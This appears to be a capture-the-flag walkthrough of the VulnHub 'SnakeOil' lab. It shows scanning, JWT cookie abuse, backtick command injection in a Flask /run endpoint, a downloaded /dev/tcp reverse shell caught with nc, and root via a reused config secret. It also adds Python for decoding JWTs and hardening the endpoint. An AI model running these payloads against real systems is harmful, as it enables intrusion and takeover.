The target host's IP is 192.168.129.5

Port scanning

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ sudo nmap --min-rate=10000 -p- 192.168.129.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 14:46 HKT
Nmap scan report for 192.168.129.5 (192.168.129.5)
Host is up (0.28s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 08:00:27:6F:04:3B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ sudo nmap -sT -sC -sV -O -p22,80,8080 192.168.129.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 14:47 HKT
Nmap scan report for 192.168.129.5 (192.168.129.5)
Host is up (0.00066s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 73:a4:8f:94:a2:20:68:50:5a:ae:e1:d3:60:8d:ff:55 (RSA)
| 256 f3:1b:d8:c3:0c:3f:5e:6b:ac:99:52:80:7b:d6:b6:e7 (ECDSA)
|_ 256 ea:61:64:b6:3b:d3:84:01:50:d8:1a:ab:38:29:12:e1 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Welcome to SNAKEOIL!
|_http-server-header: nginx/1.14.2
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to Good Tech Inc.'s Snake Oil Project
MAC Address: 08:00:27:6F:04:3B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.15 seconds

Web

Port 80 has nothing useful. Port 8080 looks like a Flask app with real application functionality; the "Useful Links" page states that the site uses JWT authentication.

Try brute-forcing the routes

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ gobuster dir -u http://192.168.129.5:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.129.5:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/1 (Status: 200) [Size: 2193]
/01 (Status: 200) [Size: 2193]
/2 (Status: 200) [Size: 2356]
/login (Status: 405) [Size: 64]
/04 (Status: 200) [Size: 2324]
/02 (Status: 200) [Size: 2356]
/4 (Status: 200) [Size: 2324]
/users (Status: 200) [Size: 140]
/registration (Status: 200) [Size: 29]
/test (Status: 200) [Size: 17]
/create (Status: 200) [Size: 2596]
/001 (Status: 200) [Size: 2193]
/002 (Status: 200) [Size: 2356]
/004 (Status: 200) [Size: 2324]
/0001 (Status: 200) [Size: 2193]
/secret (Status: 500) [Size: 37]
/run (Status: 405) [Size: 178]
/0004 (Status: 200) [Size: 2324]
/0002 (Status: 200) [Size: 2356]
/000004 (Status: 200) [Size: 2324]
/000002 (Status: 200) [Size: 2356]
/00000001 (Status: 200) [Size: 2193]
/00001 (Status: 200) [Size: 2193]
/000001 (Status: 200) [Size: 2193]
/00004 (Status: 200) [Size: 2324]
/00000002 (Status: 200) [Size: 2356]
/00002 (Status: 200) [Size: 2356]

Test the login endpoint: it is a login form, but we have no credentials to log in with yet

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/login" -d "username=admin&password=admin"
{"message": "User admin doesn't exist"}

There is also a /registration endpoint, i.e. registration; it says it needs a username and password, presumably for registering a user

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/registration" -d "username=test&password=test"
{"message": "User test was created. Please use the login API to log in!", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyNDgzNiwianRpIjoiZWUwNWVlZWYtMzhjOC00ZTk5LWJjM2EtNTZjYTA1NTc0YmJkIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3MzY5MjQ4MzYsImV4cCI6MTczNjkyNTczNn0.B3ZDfuzomn7pBJfqzpLNLwWu0lsLTqt41Cx5d0zTs-M"}

Login succeeds

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/login" -d "username=test&password=test"
{"message": "Logged in as test", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyNDg2NiwianRpIjoiYWEzZWJmNDMtNWU4MC00MzZlLTg3NzYtYzFhZDY4M2VmMjRlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3MzY5MjQ4NjYsImV4cCI6MTczNjkyNTc2Nn0.EJAq4XxmBQDCie3cO4l1d6z-AhfyjtZ3RGwoiaj0RGE", "refresh_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyNDg2NiwianRpIjoiYjdlZGIyZDQtNTMxMi00ZTgxLThjM2EtMTZlMmUzZTFmNDc4IiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiJ0ZXN0IiwibmJmIjoxNzM2OTI0ODY2LCJleHAiOjE3MzY5Mjg0NjZ9.WqZlyTtwo5b6RiLBEu_dn2wkBg8rKqc03HGIbDzc35M"}
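As an added example (not code from the walkthrough or the SnakeOil app), here is how to inspect the claims of the access token returned above without trusting its signature, and how to check its type and expiry, which is what the "make sure it hasn't expired" step further down relies on. Assumes Python 3; the token string is copied from the login response above.

```python
import base64
import json
import time

# access_token from the /login response above (copied from the page, not re-issued)
ACCESS_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyNDg2NiwianRpIjoiYWEzZWJmNDMtNWU4MC00MzZlLTg3NzYtYzFhZDY4M2VmMjRlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3MzY5MjQ4NjYsImV4cCI6MTczNjkyNTc2Nn0.EJAq4XxmBQDCie3cO4l1d6z-AhfyjtZ3RGwoiaj0RGE"


def _b64url_decode(segment):
    # JWT segments are base64url without '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_claims(token):
    """Return the payload claims plus the header's alg under the key '_alg'.

    This does NOT verify the signature: fine for inspection, never for an
    authorization decision.
    """
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    claims = json.loads(_b64url_decode(payload_b64))
    claims["_alg"] = header.get("alg")
    return claims


def seconds_remaining(token, now=None):
    """Seconds until the 'exp' claim; negative once the token has expired."""
    now = int(time.time()) if now is None else now
    return decode_claims(token)["exp"] - now


def is_usable(token, expected_type, now=None):
    # flask-jwt-extended tags tokens with a "type" claim ("access" / "refresh");
    # a refresh token presented where an access token is expected is rejected
    # even if it is unexpired, and so is a token outside its nbf..exp window.
    claims = decode_claims(token)
    now = int(time.time()) if now is None else now
    return claims.get("type") == expected_type and claims.get("nbf", 0) <= now < claims["exp"]


if __name__ == "__main__":
    c = decode_claims(ACCESS_TOKEN)
    print({k: c[k] for k in ("sub", "type", "iat", "exp", "_alg")})
    print("lifetime (s):", c["exp"] - c["iat"])
```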

The /secret endpoint cannot be accessed. Trying /run, it says a URL must be supplied, but ordinary form parameters do not satisfy the expected format, so try sending JSON

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"127.0.0.1:80"}'
{"message":"We need your secret key!","success":false}

But it turns out a secret key is required; in Flask this is the key used to protect session data, i.e. for authentication

Back to the /secret endpoint: try adding the token obtained from login, but it still does not let us in; the token is probably being passed the wrong way

Following the hint in the homepage's Useful Links: https://flask-jwt-extended.readthedocs.io/en/stable/options.html#header-options

Authentication should work by passing the token as a cookie. Send the request with Burp; it is best to log in again first to get a fresh token and make sure it has not expired

GET /secret HTTP/1.1
Host: 192.168.129.5:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyODA2NywianRpIjoiZjI1MWUyMGQtODA2Zi00ODgxLWI0NDctMTJkMmZkM2VjMDU0IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3MzY5MjgwNjcsImV4cCI6MTczNjkyODk2N30.QcjKXE3MUamnqa5-_zhLwpNj3LtFaKoAUs650gb42D4; refresh_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyODA2NywianRpIjoiYjVkOWQ1M2MtMGRiYy00MDk4LTg1YTgtODNkY2E5MzIwMDhjIiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiJ0ZXN0IiwibmJmIjoxNzM2OTI4MDY3LCJleHAiOjE3MzY5MzE2Njd9.kOJp6cyxV_K-IuneZxdDICD0fEOZD1Euo9tGXHTki28

This yields the secret key: commandexecutionissecret

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"127.0.0.1:8080","secret_key":"commandexecutionissecret"}'
{"message":" % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 411 100 411 0 0 200k 0 --:--:-- --:--:-- --:--:-- 200k\n","success":false}

Start an HTTP server locally and make the target fetch from it; the request arrives

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.129.5 - - [15/Jan/2025 16:09:16] "GET / HTTP/1.1" 200 -

Try command injection. Since nothing is echoed back, exfiltrate out-of-band: the command's output becomes part of the requested path, so it shows up in our HTTP server log

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`whoami`","secret_key":"commandexecutionissecret"}'
{"message":" % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 335 100 335 0 0 55833 0 --:--:-- --:--:-- --:--:-- 55833\n","success":false}

The log shows the command executed successfully

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.129.5 - - [15/Jan/2025 16:09:16] "GET / HTTP/1.1" 200 -
192.168.129.5 - - [15/Jan/2025 16:10:03] "GET / HTTP/1.1" 200 -
192.168.129.5 - - [15/Jan/2025 16:10:14] "GET / HTTP/1.1" 200 -
192.168.129.5 - - [15/Jan/2025 16:10:21] code 404, message File not found
192.168.129.5 - - [15/Jan/2025 16:10:21] "GET /patrick HTTP/1.1" 404 -
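The /run endpoint evidently interpolates the user-supplied "url" into a shell command line, which is why backticks in it are executed. As an added example (not the SnakeOil app's code), here is a hypothetical reconstruction of that pattern next to a hardened form that parses the URL, restricts scheme and host, and hands it to curl as an argv element so no shell ever sees it. The allow-list of hosts and the curl flags are assumptions.

```python
import subprocess
from urllib.parse import urlsplit


def build_command_vulnerable(url):
    # Hypothetical reconstruction of the vulnerable pattern: the caller's string
    # is spliced into a shell command, so `...` and ; are interpreted by the shell.
    return "curl " + url


# Assumption: the feature only needs to reach local services.
ALLOWED_HOSTS = {"127.0.0.1", "localhost"}


def validate_url(url):
    """Return the normalised URL if acceptable, else None."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None  # "127.0.0.1:80" and "192.168.129.4:8000/`whoami`" have no scheme
    if parts.username or parts.password or not parts.hostname:
        return None  # refuse userinfo tricks such as http://127.0.0.1@evil/
    if parts.hostname not in ALLOWED_HOSTS:
        return None
    return parts.geturl()


def build_command_hardened(url):
    """argv list for subprocess (no shell); None if the URL is rejected."""
    safe = validate_url(url)
    if safe is None:
        return None
    # curl receives the URL verbatim as one argument: backticks in the path are
    # just characters in an HTTP request line, never executed.
    return ["curl", "--silent", "--max-time", "5", safe]


def run_fetch(url):
    cmd = build_command_hardened(url)
    if cmd is None:
        raise ValueError("url rejected")
    # shell=False is the default for a list argv; timeout caps a hanging target.
    result = subprocess.run(cmd, capture_output=True, timeout=10, check=False)
    return result.stdout


if __name__ == "__main__":
    for u in ("127.0.0.1:80", "192.168.129.4:8000/`whoami`", "http://127.0.0.1:8080/"):
        print(repr(u), "->", build_command_hardened(u))
```

The hardened variant's safety comes from never invoking a shell, not from filtering characters; keyword filters like the one the walkthrough later runs into are bypassable, argv boundaries are not.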

Try a reverse shell directly, but some keywords seem to be filtered

Write a reverse shell file "hack.sh" locally

#!/bin/bash
# interactive bash with stdin/stdout/stderr redirected to the listener on 192.168.129.4:1234
/bin/bash -i >& /dev/tcp/192.168.129.4/1234 0>&1

Download it onto the remote host

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`wget http://192.168.129.4:8000/hack.sh -O /tmp/hack.sh`","secret_key":"commandexecutionissecret"}'
{"message":"--2025-01-15 16:26:41-- http://192.168.129.4:8000/hack.sh\nConnecting to 192.168.129.4:8000... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 61 [text/x-sh]\nSaving to: \u2018/tmp/hack.sh\u2019\n\n 0K 100% 11.8M=0s\n\n2025-01-15 16:26:41 (11.8 MB/s) - \u2018/tmp/hack.sh\u2019 saved [61/61]\n\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 226 100 226 0 0 56500 0 --:--:-- --:--:-- --:--:-- 56500\n","success":false}

Make it executable

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`chmod +x /tmp/hack.sh`","secret_key":"commandexecutionissecret"}'
{"message":" % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 226 100 226 0 0 45200 0 --:--:-- --:--:-- --:--:-- 56500\n","success":false}

Start a listener, then execute the reverse shell; the connection comes back

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`/tmp/hack.sh`","secret_key":"commandexecutionissecret"}'
{"message":"The timeout is expired!","success":false}
┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ rlwrap -nAr nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.129.4] from (UNKNOWN) [192.168.129.5] 44100
bash: cannot set terminal process group (468): Inappropriate ioctl for device
bash: no job control in this shell
patrick@SNAKEOIL:~/flask_blog$

Privilege escalation

We can run arbitrary commands, but do not know patrick's password

patrick@SNAKEOIL:~/flask_blog$ sudo -l
sudo -l
Matching Defaults entries for patrick on SNAKEOIL:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on SNAKEOIL:
(root) NOPASSWD: /sbin/shutdown
(ALL : ALL) ALL
patrick@SNAKEOIL:~/flask_blog$ sudo -i
sudo -i
[sudo] password for patrick:

But in app.py we find

app.config['SECRET_KEY'] = 'snakeoilisnotgoodforcorporations'
app.config['JWT_COOKIE_SECURE'] = True
app.config['JWT_SECRET_KEY'] = 'NOreasonableDOUBTthisPASSWORDisGOOD'

After trying them, the last string turns out to be patrick's password; privilege escalation succeeds

patrick@SNAKEOIL:~/flask_blog$ sudo -i
sudo -i
[sudo] password for patrick: NOreasonableDOUBTthisPASSWORDisGOOD

root@SNAKEOIL:~# id
id
uid=0(root) gid=0(root) groups=0(root)